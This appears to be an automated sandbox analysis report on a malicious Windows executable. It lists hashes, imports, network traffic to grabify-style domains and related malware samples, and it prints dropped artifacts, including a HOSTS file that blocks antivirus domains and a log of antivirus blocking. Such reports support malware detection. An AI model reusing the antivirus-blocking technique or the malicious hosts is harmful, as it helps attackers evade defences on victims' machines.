grabify.world | KiwiX.bin.exe | Get hash | malicious | AsyncRAT | Browse | 188.114.96.7
grabify.link | ztn2ByCTBW.hta | Get hash | malicious | Unknown | Browse | 104.26.9.202
 | xxkNTwMqKe.hta | Get hash | malicious | Unknown | Browse | 104.26.9.202
 | 5M3d1ZVA6s.hta | Get hash | malicious | Unknown | Browse | 172.67.68.246
 | N1rZQYFxPb.hta | Get hash | malicious | Unknown | Browse | 104.26.9.202
 | x0cuT4GXiQ.hta | Get hash | malicious | Unknown | Browse | 104.26.9.202
 | ACEUpF30qq.hta | Get hash | malicious | Unknown | Browse | 104.26.8.202
 | G28nz6ukRd.hta | Get hash | malicious | Unknown | Browse | 104.26.9.202
 | XqESmKfu19.exe | Get hash | malicious | Unknown | Browse | 104.26.9.202
 | XqESmKfu19.exe | Get hash | malicious | Unknown | Browse | 104.26.8.202
 | KiwiX.bin.exe | Get hash | malicious | AsyncRAT | Browse | 172.67.68.246
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | QUOTATION_APRQTRA031244#U00b7PDF.scr.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 172.67.200.96
 | http://web-hosts.io | Get hash | malicious | Unknown | Browse | 172.66.40.168
 | DHL EXPRESS.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
 | SUwX12D2S6.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 104.21.65.24
 | SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf | Get hash | malicious | Remcos | Browse | 172.67.215.45
 | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 104.21.27.85
 | https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php | Get hash | malicious | Unknown | Browse | 104.21.91.122
 | M_F+niestandardowy stempel.xlsx.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
 | rq0mVjR9ar.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 172.67.139.220
 | https://220420241.blob.core.windows.net/web/index.html?id=999 | Get hash | malicious | Unknown | Browse | 1.1.1.1
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://220420241.blob.core.windows.net/web/index.html?id=999 | Get hash | malicious | Unknown | Browse | 20.150.111.100
 | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse | 13.107.139.11
 | https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D | Get hash | malicious | HTMLPhisher | Browse | 13.107.213.69
 | OKhCyJ619J.rtf | Get hash | malicious | Remcos, DBatLoader | Browse | 13.107.137.11
 | #U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.doc | Get hash | malicious | Unknown | Browse | 52.184.66.142
 | fu56fbrtn8.exe | Get hash | malicious | Remcos, DBatLoader | Browse | 13.107.139.11
 | Payment MT103.xls | Get hash | malicious | Unknown | Browse | 13.107.246.69
 | Ref_Order04.xls | Get hash | malicious | Unknown | Browse | 13.107.213.69
 | FT. 40FE CNY .xlsx.lnk | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | Browse | 13.107.139.11
 | 3Shape Unite Installer.exe | Get hash | malicious | Unknown | Browse | 40.67.232.186
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | SUwX12D2S6.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta | Get hash | malicious | AgentTesla, GuLoader | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | file.exe | Get hash | malicious | PureLog Stealer, Vidar | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | Umulighed.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | rq0mVjR9ar.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | responsibilityleadpro.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | 8jvTeVxooN.exe | Get hash | malicious | Babuk, Djvu, Vidar | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe | Get hash | malicious | GuLoader, Remcos | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | DAIKIN AC SPAIN 2024.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
 | transferencia.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 172.67.161.186, 104.26.8.202, 52.173.151.229
                                                    No context
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):73237
                                                    Entropy (8bit):6.275833047225726
                                                    Encrypted:false
                                                    SSDEEP:1536:Ay2wpOqmXZ879wlQd0pBbgUuQF8uHBx7ghY4Mmw0F:N2oIZ879wlQd0pyihFkdwW
                                                    MD5:2726B9EE080DEA41D8DEA4DE53279509
                                                    SHA1:DEFA62A1F3C7C252ACD1B1F9E4BE600EAE52536B
                                                    SHA-256:E71825C9202FE3720A194FF7FFB55516270F7BE69C0F508DBE3DE083B3A3F7BC
                                                    SHA-512:9E9D3A6A69F333036EE7DDE38A69F1F7FA11A86998BD0976266D81098BDB2BE3597C80354806024BC5EFED99AC95FE40C3ED6246F60C3A93F48E13C461E536D4
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..o0..<0..<0..<9.^<"..<%..=<..<%..=1..<%..=*..<%..=4..<{..=5..<0..<...<...=1..<..2<1..<...=1..<Rich0..<........................PE..L.....'f...............%.....p......g.............@..........................P............@.................................t........0.......................@..T.......p...............................@...............(............................text............................... ..`.rdata...W.......X..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..T....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:[ZoneTransfer]....ZoneId=0
Process: C:\Users\user\Desktop\IPrstVM17M.exe
File Type: ASCII text, with very long lines (3147), with CRLF line terminators
Category: dropped
Size (bytes): 3971
Entropy (8bit): 4.321245594540632
Encrypted: false
SSDEEP: 48:vDZhyoZWM9rU5fFcwp2G//ReQh+35tuXM1S3jJVAE:vDZEurK97/YXVA
MD5: BEA6BA8E039E02B49E0987A62824BF80
SHA1: D04118711201A215B076607456173CB3E8965865
SHA-256: 2CF6B8D3DE36B86AFB4E4D279D27018FE13356E5BB89D0593883DD1717DADCA0
SHA-512: BA0EA7E7EE73238057D769B320E539F21B5745A41618839FEC2EF0E6339F92C04D0226D5C36AA15DF4436C9DF4660B80CE676328A017B4473DC9F055764F9269
Malicious: true
Reputation: low
Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..1.1.1.1 mail.webroot.com1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 techne
Process: C:\Users\user\Desktop\IPrstVM17M.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 5094
Entropy (8bit): 4.1748406171046035
Encrypted: false
SSDEEP: 96:UHJQajVYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYc:UzVYYYYYYYYYYYYYYYYYYYYYYYYYYYY4
MD5: 768B7C3E4130FCA1D2B435DFD57C6C05
SHA1: 1ECB0F51C5CA128089CDB9F344E23F2F63A3C8C6
SHA-256: 6914FE74FB52D7CD8F9C4ACA781EB5CAAC1F70C80F8375363D3920AE308045C1
SHA-512: 255310416B89E16B1E162EBEDA494861DB352C10C91DE1DBF350AA1747D3C185FF73C9EE2A988D116E59E469728E07BA52131B70B9A182736E7063133F90C531
Malicious: false
Preview: Welcome to FastSwipe!..No6po noxanobatb b FastSwipe!..Executable path: C:\Users\user\Desktop\IPrstVM17M.exe..Startup path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup..Text appended to executable successfully...Started blocking antiviruses...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable succes
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 6.275682581179545
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: IPrstVM17M.exe
File size: 73,228 bytes
MD5: a23b11e50c1f6fcdb42d3b2582524e2f
SHA1: 8b54ea0bc8e4545759e0ea82d28fd608fe0d97ee
SHA256: 3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
SHA512: a50d34f6a4d5aceaa27d20634929261891475e846f3df709196d0c5a31ff7399593531f452eff02436b526d359917382aa22b3a766d54514dc5d08a5fc3d0ac3
SSDEEP: 1536:Ay2wpOqmXZ879wlQd0pBbgUuQF8uHBx7ghY4Mmw0F:N2oIZ879wlQd0pyihFkdwo
TLSH: 1663A713FF5DC675D08142F4E1AD9BA5926AE1228F9087D377C0562ABC644CBAC7CE0B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..o0..<0..<0..<9.^<"..<%..=<..<%..=1..<%..=*..<%..=4..<{..=5..<0..<...<...=1..<..2<1..<...=1..<Rich0..<.......................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x409d67
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6627D6D0 [Tue Apr 23 15:42:08 2024 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 6346f6c5e6508c2748278d42ee15349a
Instruction
call 00007F920903A1F2h
jmp 00007F9209039A89h
retn 0000h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040C02Ch]
push dword ptr [ebp+08h]
call dword ptr [0040C050h]
push C0000409h
call dword ptr [0040C030h]
push eax
call dword ptr [0040C004h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040C040h]
test eax, eax
je 00007F9209039C17h
push 00000002h
pop ecx
int 29h
mov dword ptr [004123B8h], eax
mov dword ptr [004123B4h], ecx
mov dword ptr [004123B0h], edx
mov dword ptr [004123ACh], ebx
mov dword ptr [004123A8h], esi
mov dword ptr [004123A4h], edi
mov word ptr [004123D0h], ss
mov word ptr [004123C4h], cs
mov word ptr [004123A0h], ds
mov word ptr [0041239Ch], es
mov word ptr [00412398h], fs
mov word ptr [00412394h], gs
pushfd
pop dword ptr [004123C8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004123BCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004123C0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004123CCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00412308h], 00000001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10374 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xd54 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe880 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xe7c0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0xc000 | 0x228 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xac14 | 0xae00 | 0a6cf3ca9aab97c3945340ea96eeba0b | False | 0.4121318247126437 | data | 6.075701740434012 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xc000 | 0x57b2 | 0x5800 | 36910fa3b6c93981105a9e4949db13e5 | False | 0.39013671875 | data | 5.345781927472322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x12000 | 0x618 | 0x400 | 31b29ec5fef7b92285f2e1c6e698421d | False | 0.1943359375 | data | 3.355014347282592 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xd54 | 0xe00 | 7db76f241f35b5943c7810ce1cb407af | False | 0.8077566964285714 | data | 6.501155290110054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | GetModuleFileNameA, TerminateProcess, GetEnvironmentVariableA, OpenProcess, CreateToolhelp32Snapshot, Sleep, GetLastError, Process32NextW, Process32FirstW, CloseHandle, IsDebuggerPresent, SetUnhandledExceptionFilter, GetCurrentProcess, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, UnhandledExceptionFilter
WININET.dll | InternetOpenW, InternetCloseHandle, InternetOpenUrlW
MSVCP140.dll | ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z, ?_Xlength_error@std@@YAXPBD@Z, ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ, ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ, ?good@ios_base@std@@QBE_NXZ, ??7ios_base@std@@QBE_NXZ, ?always_noconv@codecvt_base@std@@QBE_NXZ, ??Bid@locale@std@@QAEIXZ, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@H@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ, ?uncaught_exception@std@@YA_NXZ
VCRUNTIME140.dll | _except_handler4_common, memset, __current_exception, _CxxThrowException, __std_exception_copy, __std_exception_destroy, __CxxFrameHandler3, memcpy, __std_terminate, __current_exception_context, memmove
api-ms-win-crt-stdio-l1-1-0.dll | fwrite, _fseeki64, __p__commode, __stdio_common_vsprintf, ungetc, _set_fmode, fsetpos, _get_stream_buffer_pointers, fread, fgetc, fputc, fclose, fflush, fgetpos, setvbuf
api-ms-win-crt-utility-l1-1-0.dll | rand, srand
api-ms-win-crt-runtime-l1-1-0.dll | _initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, system, _set_app_type, _configure_narrow_argv, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _initialize_narrow_environment, __p___argc, __p___argv, _c_exit, _exit, terminate, _invalid_parameter_noinfo_noreturn, _seh_filter_exe, _register_thread_local_exe_atexit_callback, _controlfp_s
api-ms-win-crt-filesystem-l1-1-0.dll | _unlock_file, _lock_file
api-ms-win-crt-time-l1-1-0.dll | _time64
api-ms-win-crt-environment-l1-1-0.dll | getenv
api-ms-win-crt-heap-l1-1-0.dll | _set_new_mode, free, malloc, _callnewh
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 10:54:24.859664917 CEST | 63429 | 53 | 192.168.2.5 | 1.1.1.1
Apr 24, 2024 10:54:25.100843906 CEST | 53 | 63429 | 1.1.1.1 | 192.168.2.5
Apr 24, 2024 10:54:26.213804960 CEST | 57839 | 53 | 192.168.2.5 | 1.1.1.1
Apr 24, 2024 10:54:26.572402954 CEST | 53 | 57839 | 1.1.1.1 | 192.168.2.5
Apr 24, 2024 10:54:27.286824942 CEST | 65082 | 53 | 192.168.2.5 | 1.1.1.1
Apr 24, 2024 10:54:27.519793034 CEST | 53 | 65082 | 1.1.1.1 | 192.168.2.5
Apr 24, 2024 10:54:29.399130106 CEST | 55885 | 53 | 192.168.2.5 | 1.1.1.1
Apr 24, 2024 10:54:29.554784060 CEST | 53 | 55885 | 1.1.1.1 | 192.168.2.5
Apr 24, 2024 10:54:30.267817020 CEST | 54707 | 53 | 192.168.2.5 | 1.1.1.1
Apr 24, 2024 10:54:30.423854113 CEST | 53 | 54707 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 10:54:24.859664917 CEST | 192.168.2.5 | 1.1.1.1 | 0x8636 | Standard query (0) | stopify.co | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:26.213804960 CEST | 192.168.2.5 | 1.1.1.1 | 0x296f | Standard query (0) | grabify.world | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:27.286824942 CEST | 192.168.2.5 | 1.1.1.1 | 0x25f4 | Standard query (0) | grabify.link | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:29.399130106 CEST | 192.168.2.5 | 1.1.1.1 | 0x6821 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:30.267817020 CEST | 192.168.2.5 | 1.1.1.1 | 0xf4d6 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 10:54:25.100843906 CEST | 1.1.1.1 | 192.168.2.5 | 0x8636 | No error (0) | stopify.co | | 52.173.151.229 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:26.572402954 CEST | 1.1.1.1 | 192.168.2.5 | 0x296f | No error (0) | grabify.world | | 172.67.161.186 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:26.572402954 CEST | 1.1.1.1 | 192.168.2.5 | 0x296f | No error (0) | grabify.world | | 104.21.15.56 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:27.519793034 CEST | 1.1.1.1 | 192.168.2.5 | 0x25f4 | No error (0) | grabify.link | | 104.26.8.202 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:27.519793034 CEST | 1.1.1.1 | 192.168.2.5 | 0x25f4 | No error (0) | grabify.link | | 104.26.9.202 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:27.519793034 CEST | 1.1.1.1 | 192.168.2.5 | 0x25f4 | No error (0) | grabify.link | | 172.67.68.246 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:29.554784060 CEST | 1.1.1.1 | 192.168.2.5 | 0x6821 | No error (0) | google.com | | 142.251.2.101 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:29.554784060 CEST | 1.1.1.1 | 192.168.2.5 | 0x6821 | No error (0) | google.com | | 142.251.2.102 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:29.554784060 CEST | 1.1.1.1 | 192.168.2.5 | 0x6821 | No error (0) | google.com | | 142.251.2.139 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:29.554784060 CEST | 1.1.1.1 | 192.168.2.5 | 0x6821 | No error (0) | google.com | | 142.251.2.100 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:29.554784060 CEST | 1.1.1.1 | 192.168.2.5 | 0x6821 | No error (0) | google.com | | 142.251.2.113 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:29.554784060 CEST | 1.1.1.1 | 192.168.2.5 | 0x6821 | No error (0) | google.com | | 142.251.2.138 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:54:30.423854113 CEST | 1.1.1.1 | 192.168.2.5 | 0xf4d6 | No error (0) | www.google.com | | 142.250.141.104 | A (IP address) | IN (0x0001) | false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.103A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.147A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.105A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.99A (IP address)IN (0x0001)false
                                                    Apr 24, 2024 10:54:30.423854113 CEST1.1.1.1192.168.2.50xf4d6No error (0)www.google.com142.250.141.106A (IP address)IN (0x0001)false
• stopify.co
• grabify.world
• grabify.link
• google.com
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 142.251.2.101 | 80 | 5812 | C:\Users\user\Desktop\IPrstVM17M.exe

Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 10:54:29.732553005 CEST | 104 | OUT | GET / HTTP/1.1
    User-Agent: MyApp
    Cache-Control: no-cache
    Connection: Keep-Alive
    Host: google.com
Apr 24, 2024 10:54:30.264755964 CEST | 1289 | IN | HTTP/1.1 302 Found
    Location: http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgsIxpGjsQYQyY-FShIEmhBpJA
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-oMzUwDku1m5U-qeHJEjzgA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Date: Wed, 24 Apr 2024 08:54:30 GMT
    Server: gws
    Content-Length: 392
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: 1P_JAR=2024-04-24-08; expires=Fri, 24-May-2024 08:54:30 GMT; path=/; domain=.google.com; Secure
    Set-Cookie: AEC=AQTF6HwTd9owVavQqs-d4a4i5GnkKj6n5PU7wOsBuptkd-gSAwLkNwVVIg; expires=Mon, 21-Oct-2024 08:54:30 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
